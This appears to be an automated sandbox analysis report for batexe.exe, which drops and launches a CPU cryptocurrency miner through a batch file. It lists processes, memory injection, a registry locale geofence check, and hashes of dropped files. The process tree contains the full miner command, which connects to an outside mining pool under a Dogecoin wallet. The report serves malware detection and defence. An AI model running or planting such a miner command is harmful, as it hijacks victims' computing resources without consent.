Analysis
-
max time kernel
294s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
12/02/2024, 13:44
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 5456 b2e.exe 3000 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3000 cpuminer-sse2.exe 3000 cpuminer-sse2.exe 3000 cpuminer-sse2.exe 3000 cpuminer-sse2.exe 3000 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/2136-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2136 wrote to memory of 5456 2136 batexe.exe 85 PID 2136 wrote to memory of 5456 2136 batexe.exe 85 PID 2136 wrote to memory of 5456 2136 batexe.exe 85 PID 5456 wrote to memory of 5656 5456 b2e.exe 87 PID 5456 wrote to memory of 5656 5456 b2e.exe 87 PID 5456 wrote to memory of 5656 5456 b2e.exe 87 PID 5656 wrote to memory of 3000 5656 cmd.exe 89 PID 5656 wrote to memory of 3000 5656 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\6A04.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6A04.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6A04.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6DEC.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:5656 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3000
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.8MB
MD566b04d0e8cbf92cab4e2f4302e425c86
SHA14879f96cfaf8c636332bad371327f53acf2de98e
SHA2566b854df91db563dda844e1fa99727aea2e31edcf2ad28905e7f94c937adac751
SHA51295c17cdcb60ae268abc2657d3d223a89009c636568852f461d2b3c6c7197b3981080513b546429982e78840a9997aa0bb5e1d0d0b95b47d5ac719ca91f33748c
-
Filesize
795KB
MD52064aaaed01333f786a71a5d3aaa76a8
SHA1bba30ec435c502370e92b13e0937f75162d93b7a
SHA2560066dae000a66a8f77343d14f1a2e990570fc6ca788afbca764654a790f4eded
SHA5121dadc11230bc9f01b547647ccb5645527c2cd94af27effb894dbaec348d9422fb2ea8c39f020b05db2f5eb8125e68ac183dd5fdb9a35aef156455d418bfb31cf
-
Filesize
1.5MB
MD52a089e8bf6578017b5c976d0dacec1b8
SHA1111f721c4eb9edb2555114a6c8d95d0bac6bf333
SHA2567c38ff410d155d55353f7c8d0ccda5c2f63a97eadff37a99228b2cff8efddb50
SHA5125efbe1daa3034284f68f7045fbbd4e26276165f60dca93d455772d5727deaf9ebc059a8b7b0763c6d00243fc8bbff9a197556837e71a1ecfd71e6919b8a7ecfe
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
738KB
MD5e1db68d9b44a179ee055419f90d096cf
SHA1aaeab4851455dfeb6a71c9e6d6692f0d22a433f6
SHA256b4ef1eef559073e53bd57ebd497b2d60e3b6a0b0c6c5285d39ac2a1a993409d0
SHA512f3ecec868edc0572385d0316df0a1f288a84804a4c6dddf7526afc601dbed82aaca4b13e8dea788097a409d906f954f6d39a4cb80922b9b9cd7f5c7f43b5b6a0
-
Filesize
762KB
MD581075ac4faa30f6582b1e1e4e91afd42
SHA1db7c08c97c47a01ab7f2a06c5efb72fe7895ceda
SHA2563d073e82cacdd5df3a82cc20b2398119923ee395dd7aa7dcbad2f3926440cf54
SHA5122d3d31b286733f9975ac62917ca0d834b5623ff820caeee2a646b9cb1cc5c38d7951045c0abba8e0451853f95f93dac06e84db62f5f7822fad5b0f9d5bdac001
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
892KB
MD5b287ef4fdf9a90bd96ca3cd614a2c99e
SHA19a6cc011a1d9c037e8ff5733cd90612c74741ee8
SHA25620d8617d2743853ef42bdde57460f296badb2768f9906c38dd17351b9267c961
SHA5125fcbee5a76f7c5b71b24845e1a4f25a38506c4bae579be33ca679f8c60e28d6578b9d68d0175990c69ccaf12b4db38fed6dd0320da9a2289a14c149ec2d589cf
-
Filesize
727KB
MD5bdfcffc8fb4ac8cefc985ee53e646dcd
SHA1981fca3bdf18cba5a431ebb15810d9ae09215970
SHA256e066b36ee37fb4a29a6d3d7e7b2c8e528bc65e0d52031b7177373e5ca37ded44
SHA51275dc422eb8115e43b7718e8393d112b4a72b115c8b3fe9fa2049dc3e9e02cd08cd859a2021623f046351ce64ceddea03acb8b4e65879607e524ddf4df2365630
-
Filesize
981KB
MD53aa01d515ed8368da7600abced5e3611
SHA11c5b243e1bc5e305e4363db1d61ff877ccaeb0a6
SHA256ad9e35c2bdc944b69eca5c221e22693b0fb51cf97b9a5cdaf91e0c5928fca506
SHA512a753a7b49ec1b0ec14efe5c14b7eccdad38ee265d11c5c235e5f7269edbf22bff4ecce62820677d45379716f4f34f3048c94d57969cf79c4c4ecb56d702c16b1
-
Filesize
775KB
MD59674d0b73ffe381c244de3bc20b23112
SHA19af4caa42ce42dc850a48185480a8b2deba2f931
SHA256019b5f494853bf08c40f2ef7265ccc518102c63491eb087c7d687b9423e46b75
SHA5129ab9fad4aed5ed7029719c750b01156c9b40af9bfcb4eb80360e45bf933a7e29ae46b17302c6f1371a80675f596d693349ee7e13fad64ebbae147288da36e99a
-
Filesize
640KB
MD5c58ad01ab3027d98487ee26590ae312d
SHA117adf238c23e04896723d31f860bb18a7a0344af
SHA256f2161130e000cd5be4d677c51cd1703598e8a5e7e1d3a6474e30d414f6e28a93
SHA51251ddfd432926cb52fbcf474ce10ca90da56989f4e75e5f4064107c4efd728b2958717ff1008ec99b487e6b59aea40c32004769848690dccdc2052b0e293176ec
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770